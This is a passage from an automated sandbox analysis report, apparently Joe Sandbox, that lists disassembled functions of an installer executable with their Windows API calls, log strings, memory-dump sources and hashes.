                                                                                                                                                                        • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                        Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        Strings
                                                                                                                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                        • API String ID: 1697273262-1764544995
                                                                                                                                                                        • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                        • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                        • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                        Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                          • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                        • API String ID: 2577523808-3778932970
                                                                                                                                                                        • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                        • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                        • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                        • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                        Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcatwsprintf
                                                                                                                                                                        • String ID: %02x%c$...
                                                                                                                                                                        • API String ID: 3065427908-1057055748
                                                                                                                                                                        • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                        • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                        • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                        • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                        Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                        • API String ID: 2266616436-4211696005
                                                                                                                                                                        • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                        • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                        • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                        • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                        Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                        • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1599320355-0
                                                                                                                                                                        • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                        • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                        • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                        • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                        Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                        • String ID: Version
                                                                                                                                                                        • API String ID: 512980652-315105994
                                                                                                                                                                        • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                        • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                        • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                        • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                        Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2102729457-0
                                                                                                                                                                        • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                        • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                        • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                        • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                        Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2883127279-0
                                                                                                                                                                        • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                        • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                        • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                        • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                        Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                                                                        • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                        • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                        • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                        • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                        Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                        • String ID: !N~
                                                                                                                                                                        • API String ID: 623250636-529124213
                                                                                                                                                                        • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                        • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                        • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                        • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                        Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                        Strings
                                                                                                                                                                        • Error launching installer, xrefs: 00405C74
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                                                                        • String ID: Error launching installer
                                                                                                                                                                        • API String ID: 3712363035-66219284
                                                                                                                                                                        • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                        • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                        • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                        • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                        Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                        Download Yara Rule
